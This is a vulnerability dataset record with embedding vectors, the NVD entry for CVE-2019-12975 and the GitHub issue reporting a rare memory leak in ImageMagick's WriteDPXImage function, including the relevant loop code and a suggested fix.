-0.019177470356225967, -0.04150021821260452, 0.009326628409326077, 0.0036476508248597383, -0.005697179120033979, 0.0000721817123121582, 0.014561480842530727, -0.014772621914744377, 0.003594865556806326, 0.0062796385027468204, 0.014903674833476543, 0.005176606122404337, 0.015464291907846928, -0.008511185646057129, -0.010083825327455997, 0.014182882383465767, 0.017750443890690804, 0.001841117162257433, 0.010615319013595581, -0.010855583474040031, -0.006388849578797817, -0.030113141983747482, -0.019890982657670975, -0.006035733502358198, 0.00262834713794291, -0.00784135702997446, -0.005180246662348509, 0.014743498526513577, 0.0041281795129179955, -0.004918139893561602, 0.02166748233139515, -0.004699717741459608, 0.008380131796002388, -0.012369977310299873, -0.011692868545651436, 0.008387412875890732, -0.035850364714860916, -0.0038078271318227053, -0.03034612536430359, 0.023079946637153625, -0.0014916416257619858, 0.01530411560088396, 0.016352541744709015, 0.035588257014751434, 0.024958377704024315, -0.007928726263344288, -0.013462089002132416, 0.03040437027812004, 0.026967862620949745, 0.010091106407344341, 0.021143268793821335, 0.002375341486185789, -0.003667672863230109, -0.004357522819191217, 0.029545243829488754, 0.008300043642520905, 0.028089094907045364, 0.012857787311077118, 0.004157302435487509, -0.0030087658669799566, 0.0051511237397789955, 0.011984098702669144, -0.018362026661634445, 0.0014652489917352796, -0.015595345757901669, 0.0029359585605561733, -0.011984098702669144, -0.0056789773516356945, 0.015274993143975735, 0.005340422969311476, 0.014423146843910217, -0.016075873747467995, -0.020779233425855637, 0.007109642960131168, 0.022657664492726326, 0.001108492724597454, -0.014925517141819, 0.01259568054229021, -0.0049945879727602005, -0.008598553948104382, -0.027113476768136024, 0.015420608222484589, -0.0077758305706083775, -0.019454138353466988, -0.010571634396910667, 0.00614130450412631, -0.003298175288364291, 0.00708416011184454, -0.010637161321938038, -0.020007474347949028, 0.003756861900910735, -0.006159506272524595, -0.008474781177937984, 0.012413661926984787, 0.004907218739390373, 0.011816641315817833, -0.032734207808971405, 0.008300043642520905, -0.028919100761413574, 0.013898933306336403, -0.014743498526513577, -0.015362361446022987, -0.0071023618802428246, 0.009122767485678196, -0.0012805002043023705, -0.0010329550132155418, 0.0012841405114158988, -0.0027976243291050196, -0.009079082868993282, 0.0004541361704468727, -0.04977114126086235, 0.013250946998596191, 0.007899602875113487, 0.016279734671115875, 0.0007649327744729817, -0.0062614367343485355, -0.004248311743140221, -0.023211000487208366, 0.0035803040955215693, 0.006152225658297539, -0.01368051115423441, 0.0072297751903533936, -0.007029554806649685, -0.00017837813356891274, -0.011132251471281052, -0.017750443890690804, -0.003483834210783243, 0.008219955489039421, 0.02061905711889267, -0.007659338880330324, -0.00885338056832552, 0.016702018678188324, -0.008693204261362553, 0.004699717741459608, 0.014532357454299927, -0.029399629682302475, 0.02310906909406185, 0.0016973225865513086, 0.008656799793243408, 0.007819514721632004, -0.023138191550970078, 0.018434833735227585, -0.006334243807941675, 0.008300043642520905, 0.004200987052172422, -0.003427408402785659, 0.017269914969801903, -0.013942617923021317, 0.0008832447929307818, 0.024346794933080673, 0.007819514721632004, -0.017532022669911385, 0.010768215171992779, -0.012377258390188217, -0.01100847963243723, -0.0054678358137607574, 0.005052833817899227, 0.0057335831224918365, -0.010578915476799011, 0.0025828424841165543, -0.028380325064063072, 0.006184988655149937, -0.009355750866234303, 0.0032362891361117363, -0.007328065112233162, -0.0024991140235215425, -0.029181206598877907, -0.004193706437945366, 0.021958712488412857, 0.006683719344437122, 0.022235380485653877, -0.030724722892045975, 0.022249942645430565, -0.008933467790484428, -0.00036494710366241634, -0.0065781488083302975, 0.0026902335230261087, 0.00480528874322772, 0.005810030736029148, 0.021580113098025322, 0.007739427033811808, -0.00010357990686316043, 0.0070113530382514, 0.009930930100381374, -0.008474781177937984, 0.01929396204650402, -0.011984098702669144, -0.029210329055786133, -0.0007954208413138986, -0.020386071875691414, -0.0067201233468949795, -0.007943287491798401, 0.0037641427479684353, -0.015435169450938702, 0.0024736314080655575, -0.00005818904173793271, -0.0034365092869848013, 0.004677875433117151, 0.007710304111242294, -0.00801609456539154, -0.017167985439300537, -0.020240457728505135, 0.015435169450938702, -0.0013032525312155485, 0.04659673571586609, -0.000010871339327422902, 0.018274657428264618, -0.013272789306938648, 0.0010547972051426768, -0.0009132778504863381, 0.0026811326388269663, 0.016439910978078842, -0.006312401965260506, 0.012471907772123814, -0.0020986732561141253, -0.006068496964871883, 0.01173655316233635, -0.017299039289355278, -0.016978686675429344, -0.010884706862270832, 0.008452939800918102, -0.003356421133503318, -0.003993486054241657, 0.003298175288364291, 0.016905879601836205, 0.006938545498996973, -0.00961785763502121, 0.00947224348783493, 0.00021580568864010274, -0.004663314204663038, 0.0060502951964735985, -0.03320017457008362, 0.002852229867130518, -0.010506108403205872, -0.00048462426639162004, -0.004838051740080118, 0.0002461800177115947, 0.009909087792038918, 0.015289554372429848, -0.0006184078520163894, 0.023138191550970078, 0.027186283841729164, -0.018420273438096046, -0.0012413662625476718, -0.005773627199232578, -0.015420608222484589, 0.012610241770744324, 0.005103799048811197, -0.04674235358834267, 0.004787086509168148, -0.015435169450938702, 0.017182547599077225, 0.03180227428674698, 0.03034612536430359, -0.008030656725168228, 0.0017810510471463203, 0.006683719344437122, 0.01826009713113308, 0.010112947784364223, 0.003942520823329687, 0.013695072382688522, 0.003107055788859725, -0.028307517990469933, 0.017997989431023598, 0.0035566415172070265, 0.0009319347445853055, -0.019745366647839546, 0.015595345757901669, -0.015522537752985954, 0.008918906562030315, 0.017124300822615623, 0.017575707286596298, 0.00018793409981299192, 0.025802943855524063, 0.014940079301595688, 0.011620061472058296, -0.0048671746626496315, -0.01680394820868969, -0.0005879197851754725, -0.049392540007829666, 0.015245869755744934, -0.013258228078484535, 0.0007758538704365492, 0.008860660716891289, -0.005704459734261036, -0.0003453801036812365, 0.01971624419093132, -0.001266848761588335, 0.010382335633039474, -0.0035839444026350975, -0.0015935719711706042, -0.0007071418804116547, 0.0019039135659113526, -0.0003683599643409252, 0.002187862526625395, 0.02338573709130287, -0.016556402668356895, -0.0019694401416927576, 0.015886574983596802, -0.010906549170613289, 0.014954640530049801, 0.009217416867613792, 0.0042701540514826775, 0.00941399671137333, 0.011896729469299316, 0.001198591897264123, -0.019264837726950645, 0.015726398676633835, 0.0010939312633126974, -0.02201695926487446, 0.004761604126542807, -0.01632341928780079, -0.016614649444818497, -0.008001533336937428, 0.008329167030751705, 0.021565552800893784, -0.009530489332973957, 0.00230071390978992, 0.004958183970302343, -0.0018347465666010976, 0.0009565072250552475, 0.00040681136306375265, 0.021478183567523956, 0.0023626002948731184, -0.009173732250928879, 0.013068928383290768, -0.004328399896621704, -0.021711166948080063, -0.009930930100381374, 0.001127604627981782, 0.014008143916726112, 0.009588735178112984, 0.019264837726950645, -0.013738756999373436, 0.00955233070999384, -0.008955310098826885, 0.0024754516780376434, 0.007437276188284159, 0.029851034283638, -0.0029195768292993307, 0.013418404385447502, -0.003114336635917425, 0.011889448389410973, 0.0072479769587516785, -0.013636826537549496, 0.024521533399820328, 0.0005319491028785706, -0.01798342913389206, -0.031831394881010056, 0.0061376639641821384, -0.016818510368466377, -0.013527614995837212, 0.016439910978078842, -0.005373186431825161, 0.00588647834956646, -0.007298942189663649, 0.0039716437458992004, -0.01409551315009594, -0.001243186416104436, 0.037044405937194824, -0.013469369150698185, 0.03220999613404274, -0.013214543461799622, 0.011816641315817833, 0.012923314236104488, 0.014219285920262337, 0.001568089472129941, -0.022046081721782684, 0.014983762986958027, -0.0038587923627346754, 0.01665833406150341, -0.0019931027200073004, 0.015580784529447556, -0.004099056590348482, -0.022861523553729057, -0.007218854036182165, -0.0006402501021511853, 0.0018028933554887772, 0.012675768695771694, 0.004088135436177254, 0.006530824117362499, -0.004670594818890095, 0.017590267583727837, 0.018973609432578087, -0.004084495361894369, 0.01204962469637394, -0.02492925524711609, 0.00468879658728838, -0.018551325425505638, -0.0017355463933199644, 0.0012814102228730917, 0.005547923967242241, -0.001662739086896181, 0.015551661141216755, 0.00437572505325079, -0.022861523553729057, 0.010345932096242905, 0.013192701153457165, -0.028147341683506966, 0.009297505021095276, -0.011656465008854866, -0.002324376255273819, 0.025657327845692635, -0.005922882352024317, 0.010498827323317528, -0.007579250726848841, 0.012136993929743767, 0.013964459300041199 ]
2,251
CVE-2019-12975
2019-06-26T18:15:10.213000
ImageMagick 7.0.8-34 has a memory leak vulnerability in the WriteDPXImage function in coders/dpx.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "[email protected]", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108913" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1517" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1517
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a possible but rare memory leak in function `WriteDPXImage` in coders/dpx.c. ``` pixels=(unsigned char *) GetQuantumPixels(quantum_info); for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,exception); if (p == (const Quantum *) NULL) break; (void) ExportQuantumPixels(image,(CacheView *) NULL,quantum_info, quantum_type,pixels,exception); count=WriteBlob(image,extent,pixels); if (count != (ssize_t) extent) break; status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } quantum_info=DestroyQuantumInfo(quantum_info); (void) CloseBlob(image); return(status); ``` We should call `ThrowWriterException(CorruptImageError,"UnableToWriteImageData");` when condition `y < (ssize_t) image->rows` satisfies behind for-loop. See commit https://github.com/ImageMagick/ImageMagick/commit/f1cc2eb986dc8f4a7727bce689a17566f896fde6 for more details.
Possible but rare memory leak in function WriteDPXImage
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1517/comments
2
2019-03-21T06:25:46
2019-06-27T01:29:21Z
https://github.com/ImageMagick/ImageMagick/issues/1517
423,586,613
1,517
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Possible but rare memory leak in function WriteDPXImage Issue date: --- start body --- ### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a possible but rare memory leak in function `WriteDPXImage` in coders/dpx.c. ``` pixels=(unsigned char *) GetQuantumPixels(quantum_info); for (y=0; y < (ssize_t) image->rows; y++) { p=GetVirtualPixels(image,0,y,image->columns,1,exception); if (p == (const Quantum *) NULL) break; (void) ExportQuantumPixels(image,(CacheView *) NULL,quantum_info, quantum_type,pixels,exception); count=WriteBlob(image,extent,pixels); if (count != (ssize_t) extent) break; status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } quantum_info=DestroyQuantumInfo(quantum_info); (void) CloseBlob(image); return(status); ``` We should call `ThrowWriterException(CorruptImageError,"UnableToWriteImageData");` when condition `y < (ssize_t) image->rows` satisfies behind for-loop. See commit https://github.com/ImageMagick/ImageMagick/commit/f1cc2eb986dc8f4a7727bce689a17566f896fde6 for more details. --- end body ---
1,655
[ -0.039519451558589935, 0.020478785037994385, -0.007370349485427141, 0.02302425168454647, 0.022305194288492203, 0.015934335067868233, -0.0003541362821124494, 0.027324222028255463, -0.010706780478358269, 0.03980707749724388, 0.024577418342232704, -0.00020380812929943204, 0.023800835013389587, 0.005062171723693609, -0.009096089750528336, 0.007391921244561672, -0.018810570240020752, 0.013489536941051483, -0.023297494277358055, -0.03569406270980835, -0.0006867008050903678, -0.008664654567837715, -0.014316453598439693, 0.029481397941708565, 0.0033526101615279913, 0.014489027671515942, -0.012202422134578228, -0.0011576841352507472, 0.022319573909044266, -0.007988739758729935, 0.04446657374501228, 0.03494624048471451, 0.007816165685653687, 0.01521527674049139, 0.02430417574942112, -0.019371435046195984, 0.046566225588321686, 0.055022355169057846, 0.03471614420413971, -0.003979988396167755, -0.013849065639078617, -0.06805169582366943, -0.03054560348391533, 0.011468982324004173, -0.0076867351308465, -0.018149035051465034, 0.00020818990014959127, -0.0020924601703882217, -0.04322979599237442, 0.029481397941708565, 0.017962081357836723, -0.046249840408563614, -0.00511250551789999, -0.03299040347337723, -0.011310789734125137, -0.015071465633809566, 0.05131201073527336, 0.02124098688364029, 0.021945664659142494, 0.004871621262282133, 0.005191602278500795, 0.04584716632962227, 0.016825968399643898, 0.009124851785600185, -0.005928636994212866, 0.0011073499917984009, -0.024505512788891792, 0.013640538789331913, -0.02315368317067623, -0.013798732310533524, -0.03247268125414848, -0.020665740594267845, 0.01770322024822235, 0.06494536250829697, 0.015819286927580833, -0.005162839777767658, 0.04737157002091408, 0.044351525604724884, -0.020982125774025917, -0.0002658269368112087, -0.051772210747003555, 0.019328292459249496, -0.02706536091864109, 0.028690433129668236, 0.03212753310799599, 0.004562425892800093, -0.025051996111869812, -0.050909340381622314, 0.005119696259498596, 0.00716182217001915, 0.008851610124111176, 0.02325434982776642, 0.014467456378042698, -0.028187092393636703, -0.029222536832094193, -0.019270766526460648, -0.03649940714240074, -0.012418139725923538, -0.05223240703344345, -0.02082393318414688, -0.023355018347501755, -0.007650781888514757, 0.005576298572123051, 0.02344130538403988, 0.007600448094308376, 0.00047367977094836533, -0.001253858208656311, -0.059538040310144424, 0.02229081280529499, 0.12551884353160858, 0.012353423982858658, 0.007945596240460873, -0.04731404781341553, -0.011957942508161068, 0.014740698970854282, 0.02595801092684269, 0.01757378876209259, 0.00305420090444386, -0.03212753310799599, -0.018997523933649063, -0.03851277008652687, -0.041964251548051834, -0.007557304576039314, 0.031149612739682198, 0.0009410677594132721, 0.03687331825494766, 0.006237832363694906, -0.03043055348098278, -0.012641048058867455, 0.0026838856283575296, -0.020924601703882217, -0.029423872008919716, 0.006895770784467459, -0.028676051646471024, -0.02418912760913372, -0.005820778198540211, -0.020234305411577225, 0.03043055348098278, 0.0025526576209813356, 0.010088390670716763, -0.06316209584474564, -0.05686314404010773, 0.06005576252937317, 0.00771549716591835, 0.0005950208869762719, -0.0025149069260805845, -0.04219435155391693, 0.010591731406748295, -0.03359441086649895, 0.005957399494946003, -0.0008408490102738142, -0.0014291286934167147, 0.016682157292962074, -0.017458738759160042, 0.02045002207159996, 0.0016628226730972528, 0.006500288378447294, 0.018451040610671043, -0.04176291450858116, -0.022449005395174026, -0.031207136809825897, -0.029236916452646255, 0.0381963849067688, -0.002426822204142809, -0.017300546169281006, -0.007945596240460873, 0.017775125801563263, 0.046566225588321686, -0.024879422038793564, 0.01678282395005226, 0.008326697163283825, -0.010390394367277622, 0.007945596240460873, -0.006237832363694906, -0.04935617372393608, -0.004353899043053389, -0.0020457212813198566, 0.030344266444444656, -0.010404775850474834, -0.0520598329603672, 0.03293287754058838, 0.0021823423448950052, -0.02804327942430973, 0.0009949970990419388, 0.029797783121466637, -0.024332938715815544, 0.006493098102509975, 0.017832649871706963, 0.010584540665149689, -0.011950751766562462, 0.0014965403825044632, -0.015143371187150478, 0.040928807109594345, -0.01714235357940197, 0.0354064404964447, 0.031207136809825897, -0.009800766594707966, -0.033651936799287796, 0.0066405050456523895, -0.025267714634537697, 0.0038074145559221506, -0.01879618875682354, -0.021341655403375626, -0.02400217205286026, -0.02772689424455166, -0.010742733255028725, -0.02106841281056404, 0.026806499809026718, 0.02045002207159996, -0.03687331825494766, -0.016926636919379234, -0.017300546169281006, 0.015560424886643887, -0.004688261076807976, -0.031178375706076622, 0.008736560121178627, -0.011584032326936722, 0.017717599868774414, -0.004278397653251886, -0.040439847856760025, 0.03350812569260597, -0.02137041836977005, -0.00022841340978629887, -0.004803310614079237, -0.003615066409111023, -0.028618527576327324, 0.0007343384786508977, 0.015042702667415142, -0.057582203298807144, -0.01701292395591736, 0.03437099605798721, -0.025123903527855873, -0.00033301394432783127, -0.005044195335358381, 0.00048581388546153903, -0.02290920354425907, -0.014870128594338894, 0.0014785639941692352, -0.050851814448833466, -0.0055870842188596725, 0.034140896052122116, 0.03690208122134209, -0.013065292499959469, -0.00202954257838428, 0.010706780478358269, 0.04219435155391693, -0.02032059244811535, -0.01178536843508482, 0.0005253620911389589, 0.02915062941610813, 0.030890751630067825, -0.041302718222141266, 0.008204457350075245, -0.012223994359374046, 0.00009898289135890082, -0.007600448094308376, 0.010771496221423149, 0.033651936799287796, -0.03894420713186264, -0.029855307191610336, 0.030200455337762833, 0.0089378971606493, -0.03724722936749458, -0.010052436962723732, 0.01671091839671135, -0.0027432080823928118, -0.016984160989522934, 0.012784859165549278, 0.0029840925708413124, -0.0018857307732105255, 0.005134077277034521, -0.05490730330348015, -0.025023235008120537, -0.03166733309626579, -0.01727178506553173, -0.021715566515922546, -0.010972832329571247, 0.007823356427252293, 0.00013021699851378798, 0.0017059661913663149, 0.02234833687543869, 0.010390394367277622, -0.026303159072995186, 0.023541973903775215, 0.016437675803899765, -0.01261228509247303, 0.0286472886800766, -0.0009743242408148944, -0.017286164686083794, -0.0067160059697926044, -0.026806499809026718, 0.008377031423151493, -0.008794085122644901, -0.0094915721565485, 0.040813758969306946, 0.001847980311140418, -0.0015378863317891955, 0.015301563777029514, -0.028546620160341263, -0.021758709102869034, -0.03373822197318077, -0.018149035051465034, -0.01862361468374729, -0.012907098978757858, -0.0018893261440098286, 0.006672862451523542, -0.03411213308572769, 0.005177220795303583, 0.026288777589797974, -0.007636400870978832, 0.04438028857111931, -0.024160364642739296, 0.00952033419162035, -0.029438253492116928, -0.009592239744961262, 0.01702730357646942, 0.009175186045467854, -0.020435642451047897, 0.0030308314599096775, -0.008808466605842113, -0.0021535800769925117, 0.030631890520453453, -0.02216138131916523, 0.014884510077536106, 0.05223240703344345, -0.007370349485427141, -0.022319573909044266, 0.05306651443243027, -0.051772210747003555, 0.014467456378042698, -0.004569616634398699, -0.04599098116159439, -0.0165383443236351, -0.029826544225215912, 0.03914554417133331, -0.031552284955978394, -0.0450705848634243, 0.019141336902976036, 0.015028322115540504, 0.011131024919450283, -0.012475664727389812, -0.02326873131096363, 0.00374988978728652, -0.016437675803899765, 0.021356036886572838, -0.0036689958069473505, -0.00998053140938282, -0.004332327283918858, -0.012720144353806973, -0.026605162769556046, 0.0008727572276256979, 0.04498429596424103, 0.012389377690851688, 0.039576977491378784, 0.028187092393636703, 0.009779195301234722, -0.016365770250558853, -0.004044703673571348, 0.0015288980212062597, -0.030200455337762833, -0.001253858208656311, -0.02462056092917919, -0.001856968505308032, -0.019615914672613144, 0.014898891560733318, 0.027396127581596375, -0.008226028643548489, -0.03569406270980835, -0.02516704611480236, 0.0042855883948504925, -0.011979513801634312, 0.06114873290061951, -0.04935617372393608, 0.040382321923971176, -0.028431572020053864, -0.018824949860572815, 0.029165010899305344, 0.022880440577864647, -0.017616933211684227, 0.0227653905749321, -0.0017868602881208062, 0.025440288707613945, 0.03911678120493889, -0.03569406270980835, 0.005781230051070452, 0.023168064653873444, -0.026432588696479797, 0.02515266463160515, -0.0032681208103895187, -0.04926988482475281, -0.06408248841762543, 0.010591731406748295, -0.023599497973918915, -0.049557510763406754, -0.007952786982059479, 0.07645029574632645, 0.007650781888514757, 0.011440220288932323, 0.04679632559418678, -0.03189743310213089, 0.007859309203922749, -0.049384936690330505, 0.009987722150981426, -0.00722294207662344, 0.012360614724457264, 0.039893362671136856, 0.010764305479824543, -0.011461791582405567, 0.038541533052921295, -0.01361896749585867, 0.0028672455810010433, 0.0015864227898418903, -0.021960046142339706, 0.0055439407005906105, 0.007320015225559473, 0.01041196659207344, 0.0025706340093165636, 0.010987212881445885, -0.03166733309626579, 0.02473561093211174, -0.0067555541172623634, -0.01448183786123991, -0.038972970098257065, 0.014071973972022533, -0.0016133873723447323, 0.014640030451118946, 0.04691137373447418, 0.01915571838617325, 0.025699149817228317, -0.002572431694716215, -0.031379710882902145, -0.019874775782227516, -0.0077730221673846245, 0.0037067465018481016, -0.0013949733693152666, -0.05358423665165901, -0.04334484413266182, -0.009261473082005978, 0.005748872645199299, 0.009923006407916546, 0.013849065639078617, 0.04512811079621315, 0.0021643659565597773, 0.009290235117077827, -0.01497079711407423, -0.02454865537583828, -0.0285322405397892, -0.0022057117894291878, -0.0031944173388183117, -0.03839772194623947, -0.027194790542125702, 0.027841944247484207, -0.003631245344877243, -0.04593345522880554, 0.039088018238544464, -0.005008242093026638, -0.06063101068139076, -0.01472631748765707, 0.022923583164811134, -0.012971814721822739, -0.006227046251296997, 0.02405969612300396, -0.03281782940030098, 0.007089916616678238, 0.01147617306560278, 0.007528542075306177, 0.00455883052200079, 0.004522877745330334, 0.019802870228886604, -0.02313930168747902, 0.01885371282696724, 0.012763287872076035, -0.004418614320456982, 0.006133568473160267, -0.014683173969388008, 0.024074077606201172, 0.006877794396132231, -0.035118814557790756, 0.05976814031600952, -0.05994071438908577, -0.013007767498493195, -0.055252451449632645, -0.03437099605798721, -0.0066369096748530865, 0.03218505531549454, 0.02302425168454647, 0.04714147374033928, -0.018292848020792007, -0.03169609606266022, 0.0082404101267457, -0.007780212443321943, 0.011555269360542297, -0.010577349923551083, -0.023067396134138107, -0.011778177693486214, 0.014424312859773636, -0.04524315893650055, -0.045473258942365646, 0.05577017366886139, -0.005569107830524445, 0.020737646147608757, -0.011037547141313553, 0.011267646215856075, 0.0165383443236351, 0.026720212772488594, -0.02761184424161911, -0.020924601703882217, -0.034917477518320084, -0.022751009091734886, -0.06442763656377792, 0.01034725084900856, -0.029855307191610336, -0.008563986048102379, -0.037678662687540054, 0.006892175413668156, -0.03753485158085823, 0.024778755381703377, -0.0019971849396824837, 0.04078499600291252, 0.02137041836977005, -0.011943561024963856, -0.021586135029792786, 0.009009802713990211, 0.010807448998093605, 0.015531662851572037, 0.0006875996477901936, 0.012899909168481827, 0.038541533052921295, 0.028244616463780403, -0.02582857944071293, 0.024965709075331688, -0.005249126814305782, 0.0013707051984965801, 0.00138868170324713, 0.0013401452451944351, 0.019846012815833092, 0.0018102297326549888, 0.008607129566371441, -0.0190981924533844, 0.01604938507080078, -0.020349355414509773, 0.03043055348098278, -0.016135672107338905, 0.01635138876736164, -0.011943561024963856, 0.0022236884105950594, -0.02962520904839039, 0.021960046142339706, -0.011893226765096188, -0.02860414609313011, -0.0016565308906137943, -0.017660075798630714, -0.006431978195905685, 0.002998473821207881, -0.009966149926185608, -0.009448428638279438, -0.014927653595805168, -0.007873689755797386, 0.02326873131096363, 0.0006718702497892082, -0.012101753614842892, 0.020363735035061836, 0.028028899803757668, 0.00998053140938282, -0.0004907574038952589, -0.022621579468250275, 0.0001926851982716471, 0.021960046142339706, -0.06442763656377792, -0.047601670026779175, 0.015747379511594772, -0.01817779801785946, 0.01044072862714529, -0.022003188729286194, -0.002257843501865864, 0.024217888712882996, 0.01862361468374729, -0.010900926776230335, -0.020651359111070633, -0.011921989731490612, 0.010570159181952477, -0.018652375787496567, 0.016696536913514137, 0.03825391083955765, 0.015114609152078629, -0.03836895897984505, 0.012281518429517746, -0.008743750862777233, -0.03227134421467781, -0.022391481325030327, 0.008190075866878033, 0.029179392382502556, 0.014826986007392406, 0.02185937762260437, 0.013805922120809555, -0.008434555493295193, 0.016696536913514137, -0.01026096474379301, 0.019313910976052284, -0.005155649036169052, -0.02723793499171734, 0.01843665912747383, -0.021212223917245865, -0.030027881264686584, -0.03537767753005028, 0.01616443507373333, 0.006194688845425844, -0.00018066343909595162, 0.007104297634214163, 0.023800835013389587, 0.018968762829899788, 0.00418132496997714, 0.03954821452498436, 0.007952786982059479, 0.036039210855960846, 0.010491062887012959, 0.02774127572774887, 0.001497439225204289, -0.0405261367559433, 0.00641400134190917, 0.021082794293761253, -0.039088018238544464, 0.007586066611111164, -0.006180307362228632, -0.006298952270299196, -0.0032735136337578297, -0.016926636919379234, -0.011454601772129536, -0.009189567528665066, -0.03368069976568222, -0.0013122817035764456, 0.024030933156609535, 0.024419225752353668, -0.031437236815690994, -0.012590713798999786, 0.021456705406308174, 0.03655693307518959, -0.030948275700211525, -0.020723264664411545, -0.012159278616309166, 0.0009473595418967307, -0.006974867079406977, 0.008930706419050694, 0.006543431896716356, -0.03845524787902832, -0.017099210992455482, 0.014338025823235512, 0.04305722191929817, 0.017401214689016342, 0.027770038694143295, -0.03324926272034645, 0.023053014650940895, 0.030689414590597153, 0.03261649236083031, 0.014366787858307362, -0.003987179137766361, 0.04855082929134369, 0.03152352198958397, 0.02479313500225544, -0.0012206017272546887, -0.005303055979311466, 0.02430417574942112, -0.011778177693486214, 0.016610249876976013, 0.03293287754058838, 0.00604728190228343, -0.015819286927580833, 0.0012826205929741263, 0.050477903336286545, -0.010886545293033123, 0.02962520904839039, -0.017660075798630714, 0.002964318497106433, -0.012188040651381016, -0.027194790542125702, -0.015934335067868233, 0.014237357303500175, 0.017847031354904175, -0.010527015663683414, 0.035665299743413925, 0.017056066542863846, -0.03661445528268814, 0.017286164686083794, -0.00384336756542325, -0.014783842489123344, 0.0053857481107115746, 0.016322627663612366, -0.02473561093211174, -0.02926567941904068, -0.023067396134138107, 0.013029339723289013, -0.03408337011933327, 0.008326697163283825, 0.006942509673535824, 0.0034820407163351774, -0.000059209971368545666, 0.005188006907701492, 